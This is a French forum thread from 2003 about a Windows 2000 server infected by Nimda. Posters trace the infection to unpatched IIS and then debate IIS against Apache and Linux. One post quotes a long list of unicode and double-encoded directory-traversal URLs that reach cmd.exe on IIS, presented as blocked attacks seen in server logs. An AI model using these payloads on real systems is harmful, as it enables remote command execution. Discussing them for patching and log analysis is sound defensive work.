Server infecté par nimda

Recherche :

Mot : Pseudo : Filtrer
Page : 1 2 Page Suivante Page Précédente Bas de page
Auteur	Sujet : Server infecté par nimda

nickola

GRrrr ! Je sais pas comment il est venu lui ! Pas de compte outlook de paramètrer sur le server 2k sp3 avec les derniers update windows. M'a contaminé toutes les partitions ! Aux débuts je croyais que c'était le nouveau vers LovGate, mais après utilisation du prog proposé par Symantec il m'a dit que ce n'était pas celui là ! Après un petit coup par le réseau de NAV sur la partition il a détecté nimda qui s'était infiltré partout.
Je répare toujours !

Quelqu'un aurait une idée de la manière dont il serait entré sachant qu'il n'y a pas de compte outlook sur le server ?

Publicité

karoli

nimda il attaque pas IIS plutot qu'outlook ?

Requin

Facile ! Tu fais tourner IIS sans l'avoir patché !

nickola

héhé merci ! Autant pour moi. Bizarre que krosoft ait pas inclu les patchs de IIs dans win update !

HuGoBioS

Nickola a écrit :

héhé merci ! Autant pour moi. Bizarre que krosoft ait pas inclu les patchs de IIs dans win update !

Arretez de rever de securité avec windows !
C'est a cause de gens comme vous qui croient ne la toute puissance microsoft que les gens qui font tourner des serveurx unix un peu plus securisé se retrouvent avec des megas octets de logs d'attaque nimda & co ...

Merde on fait pas un serveur web crosoft, c'est une abberation !!

---------------
-= In Kik00 101 I trust :o =-

arghbis

salops de dauphins

non, c pas une aberration, c juste suicidaire!!! [:fuel] [:fuel] [:fuel]

[:len22]

samuelp

HuGoBioS a écrit :

Pas tout a fait d'accord, Apache peut etre aussi une vraie passoire : Ce qu'il ne faut pas faire c utiliser IIS sans rien comprendre en cliquant betement sur des icones

e_esprit

samuelp a écrit :

Pas tout a fait d'accord, Apache peut etre aussi une vraie passoire : Ce qu'il ne faut pas faire c utiliser IIS sans rien comprendre en cliquant betement sur des icones

Ya une autre utilisation possible ? :kaola:

HuGoBioS

samuelp a écrit :

Pas tout a fait d'accord, Apache peut etre aussi une vraie passoire : Ce qu'il ne faut pas faire c utiliser IIS sans rien comprendre en cliquant betement sur des icones

oui tout peut etre une passoire mal configuré ... mais je pense que l'utilisateur d'apache sur system unix prend un minimum de precautions en installant son systeme ! ALor sque celui d'iis sous win32 hé béh ... la preuve sur ce tomic !

---------------
-= In Kik00 101 I trust :o =-

SylvainDNS

Un serveur IIS une fois bien configurer, avec urscan et IISlokdown, t'es tranquile.
Maintenant c'est sure que IIS non configuré c'est une grosse daube

Publicité

faf69E

HuGoBioS a écrit :

N'importe quoi... :pfff:

e_esprit

faf69E a écrit :

N'importe quoi... :pfff:

Bon d'accord, en Intranet a la rigueur...

SylvainDNS

pour eviter ce problme :
1- tu deplace le repertoir inetpub sur un autre lecteur que le system.

2- Tu installe urlscan

et voila tu est tranquille, plus personne ne te fera chier par la

HuGoBioS

faf69E a écrit :

N'importe quoi... :pfff:

c'est con j'ai vidé mes logs tt a l'heure ... mais j'en avais des pagtes et des pages d'attaques nimda venant de gars inconscient/mal informés qui se sont laissés infectés !

Si tu veux, je te mail mes logs dans une semaine...

---------------
-= In Kik00 101 I trust :o =-

samuelp

Franchement les gars quand meme rien ne vaut un Linux+Apache avec IPtables installé sur une Passerelle !

Par contre niveau Bureautique, Windows Powa !

HuGoBioS

samuelp a écrit :

Franchement les gars quand meme rien ne vaut un Linux+Apache avec IPtables installé sur une Passerelle ! :sol:

Par contre niveau Bureautique, Windows Powa ! :pfff: openoffice :love:

bon ok openoffice spatiptop mais au moisn c LIBRE !!!

---------------
-= In Kik00 101 I trust :o =-

Mitsou

lol... apache rulez... j'en vois tous les jours dans les logs des serveur IIS qui essaient de me vérolé mon apache sous linux... Trop bien !!!!

HuGoBioS

SylvainDNS a écrit :

pour eviter ce problme :
1- tu deplace le repertoir inetpub sur un autre lecteur que le system.

2- Tu installe urlscan

et voila tu est tranquille, plus personne ne te fera chier par la

tu peux detailler ce que c'est a quoi ca correspond de faire ca plz ? (je capte pas trop en tant que non windowsien !)

---------------
-= In Kik00 101 I trust :o =-

SylvainDNS

HuGoBioS a écrit :

tu peux detailler ce que c'est a quoi ca correspond de faire ca plz ? (je capte pas trop en tant que non windowsien !)

C'est un peux vieux mais ça poura tjrs t'aider :

http://www.foufouille.com/System/S [...] %20IIS.htm

Message édité par SylvainDNS le 28-02-2003 à 17:28:51

HuGoBioS

SylvainDNS a écrit :

C'est un peux vieux mais ça poura tjrs t'aider :

http://www.foufouille.com/System/S [...] %20IIS.htm

c'est pas pr m'aider j'ai aps de pbs moi (a part des kilos de logs ...) !
c'est juste pr m'informer !

---------------
-= In Kik00 101 I trust :o =-

SylvainDNS

HuGoBioS a écrit :

c'est pas pr m'aider j'ai aps de pbs moi (a part des kilos de logs ...) !
c'est juste pr m'informer !

OKI

HuGoBioS

SylvainDNS a écrit :

OKI

une question, le site est hebergé chez toi ou pas ? il tourne sur iis ?

---------------
-= In Kik00 101 I trust :o =-

SylvainDNS

yes il est chez moi sous IIS, avec une exchange 2000 pour la messagerie

HuGoBioS

SylvainDNS a écrit :

yes il est chez moi sous IIS, avec une exchange 2000 pour la messagerie

et objectivement, tu as deja eu des atatques qui t'on fait planter (si oui combien), tu as un uptime de cbien de jours ? tu as deja ete infecté ? hacké ?

---------------
-= In Kik00 101 I trust :o =-

Slyde

Lizard of the Coast

Patché, les attaques exploitant les failles unicode suivantes :

Citation :

les syntaxe /MSADC/
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+
/msadc/..%%35c../..%%5c../..%%35c../winnt/system32/cmd.exe?/c+
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+
/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+
/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+

les syntaxe /VTI_BIN/
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+

les syntaxe /PBSERVER/
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+

les syntaxe /RPC/
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+
/Rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+

les syntaxe /SCRIPTS/
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+

les syntaxe /CGI-BIN/
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+
/cgi-bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+
/cgi-bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+
/cgi-bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+
/cgi-bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+
/cgi-bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+
/cgi-bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+
/cgi-bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+
/cgi-bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+
/cgi-bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+
/cgi-bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
/cgi-bin/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+

les syntaxe /IISADMPWD/
/iisadmpwd/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
/iisadmpwd/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+

les syntaxe /SAMPLES/
/samples/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/samples/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+
/samples/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+
/samples/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+
/samples/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+
/samples/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+
/samples/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/samples/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+
/samples/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+
/samples/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+
/samples/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+
/samples/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
/samples/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+

les syntaxe /_VTI_CNF/
/_vti_cnf/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+
/_vti_vnf/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
/_vti_cnf/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+

les syntaxe /ADSAMPLES/
/adsamples/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/adsamples/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+
/adsamples/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+
/adsamples/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+
/adsamples/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+
/adsamples/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+
/adsamples/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/adsamples/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+
/adsamples/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+
/adsamples/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+
/adsamples/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+
/adsamples/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
/adsamples/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+

les syntaxe /SRCHADMIN/
/srchadmin/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/srchadmin/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+
/srchadmin/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+
/srchadmin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+
/srchadmin/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+
/srchadmin/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+
/srchadmin/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/srchadmin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+
/srchadmin/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+
/srchadmin/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+
/srchadmin/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+
/srchadmin/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
/srchadmin/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+

les syntaxe /WWWROOT/
/WWWROOT/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+
/WWWROOT/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+
/WWWROOT/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc/winnt/system32/cmd.exe?/c+
/WWWROOT/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c+
/WWWROOT/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf/winnt/system32/cmd.exe?/c+
/WWWROOT/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s/winnt/system32/cmd.exe?/c+
/WWWROOT/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c/winnt/system32/cmd.exe?/c+
/WWWROOT/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af/winnt/system32/cmd.exe?/c+
/WWWROOT/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af/winnt/system32/cmd.exe?/c+
/WWWROOT/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af/winnt/system32/cmd.exe?/c+
/WWWROOT/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af/winnt/system32/cmd.exe?/c+
/WWWROOT/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af/winnt/system32/cmd.exe?/c+

les syntaxe /_MEM_BIN/
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+
/_mem_bin/..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+
/_mem_bin/..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+
/_mem_bin/..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+
/_mem_bin/..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+
/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+
/_mem_bin/..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+
/_mem_bin/..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+
/_mem_bin/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+
/_mem_bin/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
/_mem_bin/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+

Ne marchent plus. Ah, j'en ai aussi des tonnes dans mes logs apache, comme tout le monde je crois

---------------
Le topic du QLRR et FIRE - Knowledge is power. Power corrupts. Study hard, become evil.

Requin

Nickola a écrit :

héhé merci ! Autant pour moi. Bizarre que krosoft ait pas inclu les patchs de IIs dans win update !

Oui c'est idiot de la part de Microsoft d'ailleurs ils devraient uniformiser le système de mise à jour Windows Update pour tous leurs produits !

Toutefois il existe Software Update Service pour Windows 2000/XP :
http://www.microsoft.com/technet/t [...] corpwu.asp

Et MBSA pour t'aider à voir quels sont les patchs disponibles :
http://www.microsoft.com/technet/t [...] sahome.asp

Bon par contre ceux qui affirment qu'ils n'est pas possible de faire tourner de manière sécurisée un serveur Web sous IIS sont soit des incompétents en administration réseau, soit des crétins décérébrés et bornés !

symantec

Allez un peu de lecture

http://membres.lycos.fr/azerty0/hack.html

Vive LINUX !!!!!!!!!! :bounce:

Houahhhhhhhhhhh Linux for ever :pt1cable:
Bill Gates au chiotte [:zmed] [:zmed]

[:zeitoon] Houahhh
Rebelz Attitude

WARLORDS FUCKING FORCE :fou: :fou:

Power of da linux :sol: :sol:

It' s better when it' s free :ouch: :ouch:

Message édité par symantec le 28-02-2003 à 18:01:22

HuGoBioS

Requin a écrit :

c'est peut etre possible, mais, quelle sera le prix logiciel final de ce serveur ?
J'ai un serveur linux chez moi, il ne m'a rien couté d'un point de vue logiciel et il est a peu pres securisé
Tu as un serveur iis chez toi ? tu peux me dire combien il t'as couté ? ou t'aurais couté si tu as eu les licenses par un moyen X ou Y

D'autre part, je pense qu'on peut discuter tout en restant courtois ... c'est mieux!

---------------
-= In Kik00 101 I trust :o =-

Slyde

Lizard of the Coast

Le topic était pas trop trollé, mais là,

---------------
Le topic du QLRR et FIRE - Knowledge is power. Power corrupts. Study hard, become evil.

HuGoBioS

Symantec a écrit :

superbe intervention !
je ne parle pas de hack mais de securité! Celà dit ton lien est marrant et reflete malheureusement un peu la realité

---------------
-= In Kik00 101 I trust :o =-

Slyde

Lizard of the Coast

HuGoBioS a écrit :

le problème en entreprise est tjrs le cout.

Les deux alternatives possibles :

- OS Kro$oft + IIS : pas besoin d'être un spécialiste de la mort pour l'installer, quelqu'un touchant moyennement pourra le mettre en place. Et s'il n'est pas trop stupide, même le sécuriser correctement.

- Linux/*nix avec Apache : moins cher, mais il faut se tapper les docs, eventuellement embaucher une personne pour faire ce travail, ne serais-ce que pour pouvoir integrer le serveur dans le réseau. Le temps que ca soit fait, ben la facture finale est aussi salée que celle de krosoft.

et vu qu'en apparament la maintenance sur un système krosoft semble plus aisée, là ou c'est très souvent pas trop simple et rapide sur un système *nix outdated de partout, avec packages/gcc/libs trop ancien(ne)s et impossibles à mettre à jour sans tout reinstaller ou presque, forcement ca n'incite pas trop.

---------------
Le topic du QLRR et FIRE - Knowledge is power. Power corrupts. Study hard, become evil.

SylvainDNS

HuGoBioS a écrit :

et objectivement, tu as deja eu des atatques qui t'on fait planter (si oui combien), tu as un uptime de cbien de jours ? tu as deja ete infecté ? hacké ?

Pour le moment aucune attaque m'a fait planté.
10 mois que mon serveur tourne.
Un redemarrage tout les mois pour les windows updates et c'est tout.
Quelque tentative de relay sur exchange et c'est tout

HuGoBioS

Slyde a écrit :

j'ai peur que ca ne soit que des clichés !
Perso pour metre a jour mes systems linux : apt-get update && apt-get dis-upgrade (aucun reboot de la machine necessaire, tous les services continuent a fonctionner)
ou emerge -u world (idem, et là mes applis sont compilées pour ma machine en plus !)

Le probleme d'integration d'un systeme unix dans un reseau krosoft est du au fait que krosoft se torche le c*l avec les standards et utilise ses propres systems/protocols ...

---------------
-= In Kik00 101 I trust :o =-

HuGoBioS

SylvainDNS a écrit :

:jap:
ca tourne sur un windows quoi ? 2k ? xp pro ?

apr contre : meme remarque que plus haut sur la maj du system

---------------
-= In Kik00 101 I trust :o =-

SylvainDNS

Sous 2000 SRV avec le SP3
pour la machine voir profile

Et oui c'est sur que pour les MAJ c'est chiant il faut redémarer, mais bon c'est automaitique une fois par moi en pleinne semaine à 3h du mat. Donc l'impaque est quand meme minime.

HuGoBioS

donc si par exemple une faille est decouverte le lendemain de ta maj, les "pirates" ont 29jours pour l'exploiter ...

---------------
-= In Kik00 101 I trust :o =-

fl0ups

東京 - パリ - SLP

Slyde a écrit :

- OS Kro$oft + IIS : pas besoin d'être un spécialiste de la mort pour l'installer, quelqu'un touchant moyennement pourra le mettre en place. Et s'il n'est pas trop stupide, même le sécuriser correctement.

Justement non, je crois pas que quelqu'un qui touche moyennement et qui installe IIS en cliquant sur 3 boutons sans lire de doc comme tu le laisses entendre arrive à le sécuriser. Et au final tu auras droit à la foire aux virus et aux vers sur ton réseau, et ça, ça coute TRES TRES cher.

D'autre part, je crois que tu surestimes beaucoup trop la complexité d'installation et d'utilisation d'un unix libre, que ce soit linux ou bsd. Je te conseille d'essayer une redhat, une suse, ou une mandrake un de ces jours pour en apprécier la difficulté.

SylvainDNS

HuGoBioS a écrit :

donc si par exemple une faille est decouverte le lendemain de ta maj, les "pirates" ont 29jours pour l'exploiter ...

Pas tout à fait.
Pour les MAJ de IIS je les mets à jour de suite, et planifie un redemarrage dans la nuit.
par contre si c'est une MAJ de secu pour IE6 je suis pas préce, je me log casiment jamais sur ce poste.
Mais au moins avec une MAJ auto toute les mois je suis tranquille quand je suis en vacance ou en déplacement

Requin

HuGoBioS a écrit :

c'est peut etre possible, mais, quelle sera le prix logiciel final de ce serveur ?

Le prix du serveur est une part négligeable de l'équation, j'ai besoin du framework .net et cela s'arrete la ! Le framework de sun (j2ee) est bien trop complexe à mettre en place ; par ailleurs il force l'utilisation de Java (pas vraiment pote avec !) comme langage de programmation et nécessite une serveur d'application souvent coûteux.

Citation :

J'ai un serveur linux chez moi, il ne m'a rien couté d'un point de vue logiciel et il est a peu pres securisé

Chouette je suis content pour toi ! Je suis sûr que tu es aussi content pour moi que je possède un serveur tournant sur une Debian ! Comme ca nous sommes contents !

Citation :

Tu as un serveur iis chez toi ? tu peux me dire combien il t'as couté ? ou t'aurais couté si tu as eu les licenses par un moyen X ou Y

Oui et il me coûte une inscription annuelle aux MSDNs pro pour mes développements.

Citation :

D'autre part, je pense qu'on peut discuter tout en restant courtois ... c'est mieux!

Tu t'es senti visé ? Appelons un chat, un chat ! Certaines personnes n'ont jamais réellement comparé ou n'utilisent pas les deux systèmes sus-mentionnés, ce sont par conséquent des incompétents (ce qui signifie que la personne n'a pas les compétences) ou des crétins décérébrés et bornés (genre qqn à qui tu dis qu'il a le "top" et que le reste c'est de la "daube" et va le répéter bêtement)

Message édité par Requin le 28-02-2003 à 18:34:26

HuGoBioS

Citation :

cf reponse suivante

Citation :

Chouette je suis content pour toi ! Je suis sûr que tu es aussi content pour moi que je possède un serveur tournant sur une Debian ! Comme ca nous sommes contents !

Comment se fait-il que tu ne tourne pas sous iis ? Je donnais cet exemple car je parle du poitn de vue du particulier ! Le reseau en entreprise, je ne connais pas, je n'en parle pas!

Citation :

Oui et il me coûte une inscription annuelle aux MSDNs pro pour mes développements.

Tu dev en quoi ?

Citation :

sans plus, mais qqn qui lis en diagonale ne verra que les insultes ou qualificatifs disgracieux donc, autant les eviter !

---------------
-= In Kik00 101 I trust :o =-

Publicité

Page : 1 2

Page Suivante

Page Précédente

Haut de page

FORUM HardWare.fr

Windows & Software

Sécurité

Server infecté par nimda

Sujets relatifs
Problème a faire le \ sous terminal Server	W2K server : passer du mirroring logiciel au Raid 5 matériel ?
Win2000 server sur p200mmx 128ram	Infecté par Trojan Horse je ne boot plus !!!!
[resolu]Serveur FTP windows W2k server >probleme<	Prob avec VNC sur server W2k
Quels softs pour analyser les logs NT4/2000 sur un server ou un domain	Client terminal server sur W2k pro ou es-tu?
Connaitre l'heure de deconnexion d'une station cliente 2000 server	[Win2K Server] Problème de droit d'accès avec un FTP sous IIS 5.0
Plus de sujets relatifs à : Server infecté par nimda

Page générée en 0.119 secondes